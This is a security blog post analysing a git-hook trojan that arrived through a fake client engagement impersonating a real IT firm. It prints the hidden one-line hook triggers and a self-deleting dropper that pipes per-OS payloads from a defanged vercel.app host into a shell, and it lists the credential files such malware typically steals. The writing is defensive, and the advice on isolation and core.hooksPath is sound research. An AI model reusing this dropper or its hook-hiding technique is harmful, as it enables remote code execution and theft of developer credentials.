The git hook trojan: a client sent me malware hidden in .git/hooks

Every few weeks a prospect walks in with “a small project, quick review, tell us if you can build it.” Usually it is what they say it is. Sometimes it isn’t. Over the last couple of years I have gotten used to the rhythm of looking at these: scan the folder, grep for anything that shouts, open the scripts, read the build config, check the lockfile. Most of the nasty ones try to hide in package.json lifecycle scripts, or in some minified vendor.js that nobody is supposed to read.



This month’s one was different, on both ends. The lure didn’t arrive as a suspicious cold email, it arrived as a warm inbound lead that had already spent a week talking to our sales team. And the payload wasn’t anywhere in the working tree. There was no package.json, no build step, no script to grep. The malware was sitting inside .git/hooks/, in files I almost never open and the sender definitely did not want me to.

How it actually arrived



The social engineering layer is most of what made this dangerous, so it is worth describing before I get into the repo. It came through the front door. Someone filled out our contact form, got picked up by sales, and went through the normal opening dance any small consulting engagement goes through: a discovery call, a second call to talk about scope, a few emails about timelines and team size. None of that is suspicious, because for most of those conversations there is no code yet and nothing to attack. The “client” was polite, well-prepared, and answered questions the way a real technical stakeholder answers them. By the time the project reached me for an engineering review, sales had already built a comfortable rapport. I wasn’t starting from suspicion. I was starting from “sales thinks this one is real, take a look at the materials.”

The materials came a few days into the conversation, in a reply on the existing thread. The subject line was Re: Blockchain-Based Medical Supply Chain Platform, the email sat inside the same thread sales had been working, and it even had Gmail’s “important mainly because it was sent directly to you” banner on it. All the trust signals a user interface can hand you, stacked in a row.

Inside the email was a Dropbox link to a zip file, and a short, polite note asking for feedback on a handful of specific things: the overall system architecture and backend approach, the feasibility of the proposed development roadmap, and a view on the estimated MVP timeline. The writing is unremarkable in a good way. It sounds exactly like a non-technical stakeholder who has been briefed by an engineer and is trying to convey the scope of a prototype review. The ask is concrete, the framing is reasonable, and nothing about the tone feels off.

The zip itself, once downloaded, unpacked into a folder that looked like a normal early-stage project handoff: a README, a Word document describing the business problem, several PDFs of reference research, and an embedded git repository. Exactly the kind of bundle you get when a non-engineering stakeholder wants to give you “everything we have so far.”

One detail in the email I only appreciated later. Near the bottom, the sender writes: “When reviewing the documents, it would be helpful to focus on timeline-milestones.md and legal-commercial.md, as they outline the development phases, key milestones, and important project considerations.” That sentence is not there by accident. It is a direction-of-gaze trick. Pointing a time-pressed reviewer at two specific files means the reviewer spends their attention on those two files and skims the rest. Both files are entirely benign markdown. The files the attacker does not want you looking at are the ones under .git/hooks/. Magicians call this “watch my right hand.”

The sender was operating from madhulika.devanshi@nemoitsolutions.org, and the name on the email belongs to a real person who actually works at a real company. That real company is Nemo IT Solutions, headquartered at 801 E Campbell Road, Suite 320, Richardson, Texas. A proper US-based IT services firm with a website, a team page, offices, and a track record going back years. The person whose identity was borrowed has a LinkedIn profile and a bio on the real company’s site and nothing at all to do with any of this. Everything about the sender identity was lifted from a legitimate US company, except for the top-level domain.

.org instead of .com. That is the whole trick.

If you’re reading a sender address quickly, “nemoitsolutions” is the part your brain latches onto. The TLD slides past. You subconsciously fill in the familiar one. I have caught myself doing it on less careful days, and I know I am not alone, because phishing-awareness training has been hammering on this exact pattern for a decade and it still works.





The moment I got suspicious, the first thing I did was pull the whois record on the .org.

Seventeen days old. Parked name servers. No website. That is not a company domain, it is a throwaway used exactly long enough to run a fake sales conversation and deliver one zip file. The emails were never the point. The CRM entry was never the point. They were the envelope. The payload was the thing they wanted us to clone.

The identity theft layered on top is what makes this particularly ugly. The attacker didn’t invent a company, they borrowed one. Every sanity check a cautious person runs, “does this name exist, does this company exist, does the team page match”, comes back clean, because the real thing behind the costume is clean. The only evidence that anything is wrong is the swapped TLD, and a whois record you have to actively go and pull.
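The TLD comparison is easy to make mechanical instead of relying on a tired pair of eyes. A minimal sketch, assuming you take the expected domain from the company's real website rather than from anything in the email; `sender_domain_matches` is a hypothetical helper name, and the addresses in the usage note are placeholders:

```shell
# Compare the domain part of a sender address with a domain you already trust.
# Both sides are lowercased, since domain names are case-insensitive.
sender_domain_matches() {
    sender="$1"      # full address, e.g. someone@example.org
    expected="$2"    # known-good domain, e.g. example.com
    # Drop everything up to and including the last "@".
    domain=$(printf '%s' "${sender##*@}" | tr '[:upper:]' '[:lower:]')
    expected=$(printf '%s' "$expected" | tr '[:upper:]' '[:lower:]')
    if [ "$domain" = "$expected" ]; then
        echo "match: $domain"
    else
        echo "MISMATCH: sender uses $domain, expected $expected"
        return 1
    fi
}
```

Calling `sender_domain_matches "someone@example.org" "example.com"` prints a mismatch and returns non-zero. A `whois` lookup on the mismatched domain is the natural next step.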

I want to be explicit about one thing before moving on: the real Nemo IT Solutions and the real person whose name was used are victims here too. Nothing in this post is about them. They are just the costume the attacker put on, and they will probably only find out this is happening when a victim eventually calls their Richardson office asking why they shipped malware.

What git hooks actually are (short version)

When you run git commit, git checkout, git push, and a handful of other commands, git looks inside .git/hooks/ for a script with a matching name. If it finds one, and the file is executable, git runs it. No flags. No prompts. No “this repo wants to run code, is that okay.” The hook just runs, with your shell, as you.

A fresh git init drops a bunch of files in there called things like pre-commit.sample, commit-msg.sample. They are disabled on purpose: git only runs hooks without the .sample suffix. So the convention everyone learns is simple. If the filename ends in .sample, it is inert documentation. If it doesn’t, it runs.

The attacker in this repo weaponised both halves of that convention.

The layout

The repo was called Healthcare-Medical-Supply-Plan-0115. Branches master, docs, code, all created within a month of each other, all with a single commit message that just said upload. The committer was git <git@medicalhealthcarechain.com>. A domain name designed to look plausible if you squint, paired with the most generic username possible.

Inside .git/hooks/ there were four interesting files:

    .git/hooks/
    ├── commit-msg (executable)
    ├── post-checkout (executable)
    ├── pre-push (executable)
    └── post-rebase.sample (executable)

The first three are the triggers. They are the files git will actually invoke. The fourth is where the damage lives, and its name is the first bit of trickery: .sample is supposed to mean “ignore me, I am a template”. It is the file you, the human reviewer, have been trained to skip.
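To see at a glance which files git itself would invoke, the directory can be classified by the two properties git checks: the executable bit and the absence of a `.sample` suffix. A minimal sketch; `classify_hooks` is a hypothetical helper name, and the default path assumes you are at the top of the unpacked repo:

```shell
# Classify every file in a hooks directory by whether git would invoke it.
# Git only runs a hook that is executable and whose name has no ".sample" suffix.
classify_hooks() {
    hooks_dir="${1:-.git/hooks}"
    for f in "$hooks_dir"/*; do
        [ -f "$f" ] || continue
        name=$(basename "$f")
        case "$name" in
            *.sample)
                status="sample (git will not invoke it directly)" ;;
            *)
                if [ -x "$f" ]; then
                    status="ACTIVE"
                else
                    status="inactive (not executable)"
                fi ;;
        esac
        printf '%s\t%s\n' "$name" "$status"
    done
}
```

On a layout like the one above this would mark three files ACTIVE. The "sample" label only means git will not call that file by itself; an active hook can still run it with `sh`, so every file in the directory deserves a read.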

Three triggers, not one



Most hook-based attacks I have read about use a single hook, usually post-checkout or pre-commit, and pray the victim runs that command. This attacker didn’t want to rely on a single workflow step. They wired up three:

- post-checkout fires whenever git checkout or git switch updates the working tree. Git also runs it at the end of git clone, but hooks are never transferred by a clone; here they arrived pre-planted inside the zipped .git directory, so the first branch switch is enough to trigger it.

- commit-msg fires on every git commit, no matter what the message is.

- pre-push fires before git push can talk to the remote.

If you just switch branches to peek at the files, post-checkout already caught you. If you resist the urge to commit, pre-push catches you. If you never push but you do try to make a small change and commit, commit-msg catches you. It is three nets strung up across the three places a developer is most likely to walk.

The camouflage



I expected the hook files to be short, ugly shell scripts obviously doing something weird. They weren’t. Each of the three trigger files is about a hundred lines long, and almost every line is a verbatim copy of the comments you’ll find in the sample hooks that ship with git itself. Real documentation, real examples, the ones you would expect to see if you opened a template file.

Somewhere in that wall of comments, each file has exactly one live line. One. Here is what commit-msg looks like around the interesting part:

    # the commit message, so you can add *new* suggestions for the
    # user if the template is updated to take the new commit message.
    #
    # With this workflow, you would want to know:
    sh "$(dirname "$0")/post-rebase.sample" >/dev/null 2>&1 &
    # (1) ... if a topic branch has ever been merged to "next".
    # (2) ... if a topic branch has ever been merged to "master".

The live line sits between two comment lines, with no blank line above or below it. If you are skimming, it looks like part of the comment block. If you are scrolling with the cursor key, you blow past it. The >/dev/null 2>&1 & at the end means the victim will never see output, and the shell returns immediately.

post-checkout puts its live line as the very last active statement, after 52 lines of commentary. pre-push puts it mid-paragraph inside a long block comment about topic-branch workflows. Different positions for the same line, so pattern-matching on “last line of the file” or “first non-comment line” doesn’t catch all three.

All three lines do the same thing: sh post-rebase.sample, backgrounded, silent. They don’t contain the payload. They are pointers.
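Because the trick depends on a human skimming past one line in a wall of comments, the counter is to strip the comments and look at what is left. A minimal sketch, assuming a POSIX shell with `awk`; `live_lines` is a hypothetical helper name:

```shell
# Print every line of each hook file that is neither blank nor a comment,
# prefixed with the file name and its original line number.
live_lines() {
    hooks_dir="${1:-.git/hooks}"
    for f in "$hooks_dir"/*; do
        [ -f "$f" ] || continue
        awk -v name="$(basename "$f")" '
            NR == 1 && /^#!/ { next }   # skip the shebang
            /^[ \t]*#/       { next }   # skip comment lines
            /^[ \t]*$/       { next }   # skip blank lines
            { printf "%s:%d: %s\n", name, NR, $0 }
        ' "$f"
    done
}
```

Stock sample hooks contain real shell code too, so the output has to be read rather than counted. The point is only that a single backgrounded `sh` call can no longer hide between two comment lines.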

The dropper

post-rebase.sample is the actual payload, and it follows the same comment-camouflage trick. A hundred-odd lines of legitimate-looking documentation at the top, the real code in the middle, more documentation at the bottom so the file ends on an innocent note. The real code is about twenty lines.

Here is what it does, with my annotations:

    platform="$(uname -s 2>/dev/null || echo "Unknown")"
    case "$platform" in
      Linux)
        (bash -c "wget -qO- 'https://cleverstack-ext30341[.]vercel[.]app/api/l' | sh" > /dev/null 2>&1 &)
        ;;
      Darwin)
        (bash -c "curl -s 'https://cleverstack-ext30341[.]vercel[.]app/api/m' | sh" > /dev/null 2>&1 &)
        ;;
      MINGW*|MSYS*|CYGWIN*)
        cmd.exe //c start "" powershell.exe -WindowStyle Hidden -Command \
          "Start-Process cmd -ArgumentList '/c curl.exe -s https://cleverstack-ext30341[.]vercel[.]app/api/w | cmd' -WindowStyle Hidden" 2>&1 &
        ;;
      *)
        (bash -c "curl -s 'https://cleverstack-ext30341[.]vercel[.]app/api/m' | sh" > /dev/null 2>&1 &)
        ;;
    esac

    tmp_dir="${TMPDIR:-/tmp}"
    echo "0115" > "$tmp_dir/.git-checker"

    rm -f "$(dirname "$0")/commit-msg" \
          "$(dirname "$0")/post-checkout" \
          "$(dirname "$0")/pre-push" \
          "$0"

(I have defanged the domain with [.] so you can’t click it by accident.)

Four steps, and every one of them is doing a job.

uname -s picks the OS branch. The author wrote separate payloads for Linux, macOS, Windows (under MSYS/Cygwin/Git Bash) and a catch-all fallback. This is not a shotgun that sprays at one platform. It is engineered to work on whatever machine a software developer happens to be sitting in front of.

Each branch then fetches a platform-specific URL and pipes the response straight into a shell. curl | sh, wget | sh, powershell -Hidden. No file touches disk. Whatever comes back from the server runs immediately, under the user’s account, with the user’s environment variables and credentials. The endpoints are /api/l, /api/m, /api/w, which tells you how confident the attacker is that they can serve different payloads per OS.

The C2 is on vercel.app. That is the same Vercel you deploy your Next.js site to. It is a legitimate, widely trusted hosting platform, and network monitoring rarely flags traffic to it because half the internet’s marketing pages live there. The choice is deliberate. If the attacker had used a sketchy VPS in an unrelated TLD, a serious corporate egress filter would have had a good chance of blocking it. vercel.app sails through.

Next line, the script writes the string "0115" to a file called .git-checker in $TMPDIR, falling back to /tmp when that variable is unset. That number matches the suffix on the repo folder (Healthcare-Medical-Supply-Plan-0115), so I am almost certain it is a campaign identifier. My read is that this is the same attacker running the same playbook against many developers, with a different numeric tag per campaign so they can correlate which lure caught which victim.

And then the last line deletes all four hook files, including itself. That is the part I find most unsettling. After one run, there is nothing left in .git/hooks/ for you to inspect. If you came back an hour later and checked, the directory would look completely normal. The only artifact is the .git-checker file in the temp directory, with a four-character string in it, and if you are not specifically looking for it you will never notice.
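Since the marker file is the one artifact this sample leaves behind, it is worth checking for on any machine that has touched a suspicious bundle. A minimal sketch that mirrors the dropper's own path logic (`$TMPDIR`, else `/tmp`); `check_marker` is a hypothetical helper name:

```shell
# Look for the marker file this particular dropper writes after it runs.
# Returns non-zero when the marker is present.
check_marker() {
    tmp_dir="${TMPDIR:-/tmp}"
    marker="$tmp_dir/.git-checker"
    if [ -f "$marker" ]; then
        echo "FOUND $marker (contents: $(cat "$marker"))"
        return 1
    fi
    echo "no marker in $tmp_dir"
}
```

A clean result proves very little: temp directories are often cleared on reboot, and a different campaign could use a different file name. A hit, on the other hand, is a strong reason to treat the machine as compromised.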

What the remote payload actually is, and why we can’t know

I did not run the payload. I am not going to run the payload. What I can say is what attackers in this class of operation typically do once they have code execution on a developer’s machine, because the pattern is well documented:

- Grab ~/.ssh/ and ~/.gitconfig to harvest SSH keys and git credentials. Anyone whose personal SSH key unlocks company GitHub orgs has just handed over the company.

- Scrape ~/.aws/credentials, ~/.config/gcloud/, ~/.npmrc, ~/.pypirc, environment variables. Cloud keys, package registry tokens, CI tokens.

- Drop a persistence layer: a cron job, a LaunchAgent on macOS, a systemd user unit on Linux, a scheduled task on Windows. Something that re-establishes a connection even after the hook files are gone.

- Stage for lateral movement. A developer’s machine usually has SSH access to dev and staging, sometimes prod, and almost always to the git provider with write permissions on dozens of repos. That last one is how you turn one compromised laptop into a real supply chain attack against the developer’s employer and their employer’s customers.

The Vercel endpoint could serve any of these, and could serve different things to different victims, and could change at any moment. That is the other reason the curl | sh model is attractive to attackers: the payload is never fixed, so static analysis of the repo tells you nothing about what will actually run.

Why this is harder to catch than it should be

When I talk to other engineers about this one, the first reaction is usually “well, I would have seen it.” Maybe. I want to push back on that a little, because I think the attacker has thought about this harder than we want to admit.

The working tree review tells you nothing. There is no package.json, no setup.py, no Makefile. You cannot even grep the source for curl or wget because the source is the documentation and a Word doc. The whole point of this approach is that your normal review instincts are pointed at the wrong directory.

.git/hooks/ is not something most people open. Even when they do, they look at the filenames, see a bunch of things ending in .sample, and move on. I have been using git for twelve years and I could not have told you, without checking, whether git runs a file called post-rebase.sample. (It doesn’t. Which is why the attacker renamed the real payload to end in .sample, so even a careful reviewer who opens it thinks it is a template.)

And the three trigger files are not short scripts that obviously look wrong. They are long files that obviously look right. Each one is ninety-nine percent real git documentation, and the one percent that isn’t is dressed up as a comment. If I had opened commit-msg and scrolled through it, I am maybe sixty percent confident I would have caught that line on the first pass, and I was actively looking for suspicious hooks at that point. If I had been reviewing casually, I would have missed it.

The multi-trigger design is the piece I admire most, in the “admiring the architecture of a trap that almost caught you” sense. Even if you happen to disable the hooks you checked, the next git command in a different code path would have fired the one you didn’t. And because the dropper deletes everything after a single run, post-hoc forensics on a machine that was hit a week ago are basically impossible.

How we handle client code, and why that saved us

I want to be careful here, because the last thing I want to do is write a “lessons learned” section that implies I was careless before and wise after. I wasn’t careless. We have always treated client code as untrusted by default, because anyone who has spent more than a couple of years doing consulting has at least one story about a “harmless sample project” that turned out to be something else. The reason this post exists is that the attacker was clever enough that the usual process was the only thing between us and a compromised workstation. So I want to write down what that process actually is, in case it is useful to anyone else running a small shop.

Rule one: client code never touches a machine that has credentials on it. Not my laptop, not a teammate’s laptop, not anything that is logged into GitHub with my SSH key or has an AWS profile sitting in ~/.aws. We keep a small pool of dedicated review boxes for this. Some are plain VirtualBox VMs, some are cloud instances we spin up on demand, and for the lightest cases we use throwaway Docker containers on an otherwise empty host. The specific technology is not the point. The point is that the environment has nothing worth stealing and can be destroyed without thinking about it.

Rule two: the review environment gets reformatted every single time. Not “cleaned.” Not “reset to a snapshot from last month that also had three other clients’ code on it at some point.” Wiped. A fresh install, fresh clone of whatever baseline tooling we need, and nothing else. If it is a VM, we blow the disk image away and build a new one from a known-good template. If it is a cloud instance, we terminate it and provision a new one. Docker is nice for this because docker run --rm does most of the work for you, but only if you resist the urge to mount your home directory into the container, which defeats the entire point.

Rule three: no network egress that we haven’t thought about. A review VM does not need to reach arbitrary hosts on the internet. It needs to reach the git host the code came from, and maybe a package registry, and that is usually it. On the VMs we use seriously, egress is filtered. If the attacker’s payload in this sample had been allowed to run, the curl to cleverstack-ext30341[.]vercel[.]app would have been a connection to something that was not on our allowlist, and the review machine would have shown that connection in its logs even if the payload finished silently. Having somewhere to look after the fact matters almost as much as not running the thing in the first place.
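For the lightest cases, rules two and three can be combined in a single container invocation. A minimal sketch, assuming Docker is installed on an otherwise empty host; `review_shell` is a hypothetical helper name, and the default image is only a placeholder for whatever image you trust that already contains your reading tools:

```shell
# Open a throwaway shell over an unpacked bundle: no network, read-only mount,
# container removed on exit. REVIEW_IMAGE is an assumption, not a recommendation.
review_shell() {
    bundle_dir="$1"
    image="${REVIEW_IMAGE:-alpine:3}"
    # Resolve to an absolute path for the bind mount; bail out if it is missing.
    abs_dir=$(cd "$bundle_dir" && pwd) || return 1
    docker run --rm -it \
        --network none \
        -v "$abs_dir":/review:ro \
        -w /review \
        "$image" sh
}
```

With `--network none` a payload that does run has nowhere to fetch its second stage from, and the `:ro` mount keeps it from rewriting the bundle. Only the bundle directory is mounted, never the home directory.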

Rule four: even inside the disposable environment, we prefer to read before we run. For a git repo specifically, that means cloning with git clone --no-checkout so the initial checkout phase does not fire, and reading files through git show and git log -p instead of materialising a working tree. It means opening .git/hooks/ before opening anything else and treating every file in there as hostile regardless of extension, because after this one I am never going to assume .sample means inert again. A one-liner like

    find .git/hooks -type f -exec wc -l {} \; -exec head -5 {} \;

is enough to catch the “why is this supposedly-template file 130 lines long and executable” case, which is exactly the question I would have been asking if I had opened post-rebase.sample cold.

Rule five, and this one is the cheap win I want everyone reading this post to take away even if they skip the rest: set core.hooksPath globally.

    git config --global core.hooksPath ~/.git-hooks-global

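Once that is set, git stops looking in the .git/hooks/ directory of the repos you touch and only runs hooks from the directory you point it at. The attacker’s hooks stay on disk. They just never fire. One caveat matters for exactly this kind of bundle: a repository’s own .git/config takes precedence over your global config, so an archive that ships a complete .git directory could set core.hooksPath right back to its own hooks. Read .git/config before running anything, or override per command with git -c core.hooksPath=/dev/null, which outranks both files. You lose the ability to use per-repo hooks, which is a real trade-off if you work on projects that ship legitimate ones, so this is not something I would recommend forcing on a whole engineering team for all their repos. But for the specific case of “someone I do not fully trust just handed me a zip file and I want to take a look,” it is the single most effective one-line defence I know of. Think of it as the git equivalent of “don’t open attachments from strangers.”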
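When the .git directory itself comes from the sender, its config file is attacker-controlled as well, so it helps to pair the global setting with a per-command override and a quick look at the shipped config. A minimal sketch; `git_nohooks` and `risky_config` are hypothetical helper names, and the list of config keys is illustrative rather than exhaustive:

```shell
# Run one git command with hooks disabled for that invocation only.
# A -c option on the command line outranks ~/.gitconfig and the repo's .git/config.
git_nohooks() {
    git -c core.hooksPath=/dev/null "$@"
}

# Print lines in an untrusted repo's config that can point git at
# programs of the sender's choosing (hooks path, fsmonitor, ssh command,
# pager, editor, aliases). Prints nothing when none are present.
risky_config() {
    cfg="${1:-.git/config}"
    [ -f "$cfg" ] || return 0
    grep -n -i -E 'hookspath|fsmonitor|sshcommand|pager|editor|^[[:space:]]*\[alias' "$cfg"
}
```

Typical use is `risky_config` first, then something like `git_nohooks log -p` to read history. Neither replaces the disposable environment; they only narrow what an ordinary git command can be tricked into running.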

Any one of those controls on its own is worth something. All of them together is what turns a well-engineered trap into a curiosity I can write a blog post about, instead of an incident response I am writing an internal post-mortem about.

There is one more habit I am adding after this: treat “zip with no real source files” as a flag, not a relaxing signal. A folder where the working tree is nothing but a README, a Word doc, and some PDFs used to mean “probably a stakeholder who just wants an estimate.” After this one, it is the exact shape of the trap, and the next time I see it I am opening .git/hooks/ before I open anything else.

Closing thought

The reason this one bothers me more than the usual malicious-npm-package story is that the victim does not have to do anything wrong. They don’t npm install a random dependency. They don’t run a strange shell script. They don’t even open a file. They unpack an archive someone sent them and run an ordinary git command inside it, a git checkout or a git commit, the kind of operation every developer performs dozens of times a week without thinking. Looking around a repository is not supposed to execute arbitrary code. The attacker found a corner of git’s design where, technically, it can: hooks never travel through git clone, but a .git directory shipped inside a zip carries them along intact.

I don’t think this is a git bug. Hooks are a useful feature, and making them opt-in would break real workflows for real people. It is a sharp edge, and the problem is that almost nobody in our industry is taught about it until the day someone tries to use it on them. The attackers have clearly noticed. We should probably catch up.

All code in this post was reproduced from a real malware sample for defensive-research purposes only. The C2 domain has been defanged. If you work in incident response and want the full IOCs, reach out.